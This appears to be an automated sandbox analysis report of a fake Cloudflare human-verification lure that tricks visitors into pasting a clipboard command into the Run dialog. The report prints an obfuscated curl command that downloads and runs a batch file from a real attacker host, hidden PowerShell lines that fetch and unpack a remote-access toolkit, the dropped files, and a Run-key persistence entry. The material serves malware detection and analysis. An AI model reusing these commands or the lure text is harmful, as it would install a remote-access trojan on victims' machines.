Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF100000.00000004.00000800.00020000.00000000.sdmp, client32.exe
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb7 source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF157000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Obfuscated command line found
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')" Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11145440 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID, 37_2_11145440
PE file contains sections with non-standard names
Source: PCICL32.DLL.34.dr Static PE information: section name: .hhshare
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8B7E1E00 pushad ; retf 8B90h 34_2_00007FFC8B7E1E83
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8B7F5D7A push cs; iretd 34_2_00007FFC8B7F5D7F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA50AFB push E8CE8B49h; retf 34_2_00007FFC8BA50B01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA37934 push ebx; retf 34_2_00007FFC8BA3793A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA46CA3 push FFFFFFE8h; retf 34_2_00007FFC8BA46CC1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCD2425 push ebp; retf 34_2_00007FFC8BCD2428
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCD4BB5 push eax; retf 34_2_00007FFC8BCD4BB6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCCB17B push esi; retf 34_2_00007FFC8BCCB17A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCCB133 push esi; retf 34_2_00007FFC8BCCB17A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCCB0CA push ebx; retf 34_2_00007FFC8BCCB132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCD26F8 push esi; retf 34_2_00007FFC8BCD26F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCD2EF4 push ss; ret 34_2_00007FFC8BCD2EF7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCD1537 push edx; retf 34_2_00007FFC8BCD1539
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCD2C98 push esp; ret 34_2_00007FFC8BCD2C99
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BF52C1A push edx; retf 34_2_00007FFC8BF52C1B
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1116F055 push ecx; ret 37_2_1116F068
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11169F49 push ecx; ret 37_2_11169F5C
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCB6BBF push ecx; ret 37_2_6CCB6BD2
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCA94C5 push ecx; ret 37_2_6CCA94D8
Source: msvcr100.dll.34.dr Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior
barindex
Detect drive by download via clipboard copy & paste
Source: Chrome DOM: 0.2 OCR Text: fountainofhealth.ca Verify you are human by completing the action below O Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps use keyboard To prove you are not robot 1, Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3, Press Enter key on your keyboard Ray 10: 8ed10zeshpn Performance and security by Cloudflare
Source: screenshot OCR Text: e about:blank -8 x Home Fountain of Health X fountainofhealth.ca/en o x Keyboard Properties Speed Hardware Character repeat Repeat delay .ca Long Short completing the action below Repeat rate: Slow Fast 5 Click here and hold down a keyto test repeat rate: view the security of your connection before proceeding. Cursor blink rate Fast None Complete these verification steps Lise keyboard To prove you are not robot Bopiy Canc 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 8ed10zeshpn Performance and security by Cloudflare 11:05 ENG p Type here to search SG 2/05/2025
Source: screenshot OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 8ed10zeshpn Performance and security by Cloudflare 11:05 ENG p Type here to search SG 2/05/2025
Source: screenshot OCR Text: -8 about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 8ed10zeshpn Performance and security by Cloudflare 11:05 ENG p Type here to search SG 2/05/2025
HTML page adds supicious text to clipboard
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Clipboard modification: C:\WINDOWS\system32\conhost.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Ent
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\PCICHEK.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\pcicapi.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\jkosfe\vpnclient2.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\client32.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\remcmdstub.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\rgakat\vpnclient2.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\msvcr100.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC97030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod, 37_2_6CC97030
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC85490 GetPrivateProfileIntA, 37_2_6CC85490
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC850E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA, 37_2_6CC850E0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError, 37_2_11127E10
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Support11 Jump to behavior
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Support11 Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary, 37_2_11139090
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows, 37_2_1115B1D0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt, 37_2_11113290
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos, 37_2_110CB2B0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos, 37_2_110CB2B0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer, 37_2_110254A0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId, 37_2_110258F0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer, 37_2_11023BA0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId, 37_2_11024280
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11112670 IsIconic,GetTickCount, 37_2_11112670
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA, 37_2_111229D0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA, 37_2_111229D0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId, 37_2_110C0BB0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop, 37_2_1115ADD0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop, 37_2_1115ADD0
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 37_2_11143570
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
